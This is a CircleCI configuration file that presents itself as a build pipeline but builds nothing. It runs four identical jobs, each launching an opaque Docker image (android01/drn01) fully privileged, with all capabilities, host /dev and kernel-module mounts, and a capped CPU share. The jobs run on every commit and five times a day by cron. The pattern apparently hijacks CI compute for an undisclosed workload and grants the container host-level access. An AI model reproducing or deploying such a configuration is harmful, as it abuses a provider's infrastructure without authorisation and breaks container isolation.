version: 2
jobs:
  build_001:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 android01/drn01
  build_002:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 android01/drn01
  build_003:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 android01/drn01
  build_004:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          sudo docker run --privileged --cap-add=ALL --cpus=0.9 -v /dev:/dev -v /lib/modules:/lib/modules -p 443:443/tcp --dns=1.1.1.1 android01/drn01
workflows:
  version: 2
  commit:
    jobs:
      - build_001
      - build_002
      - build_003
      - build_004

  nightly:
    triggers:
      - schedule:
          cron: "0 0,5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build_001
      - build_002
      - build_003
      - build_004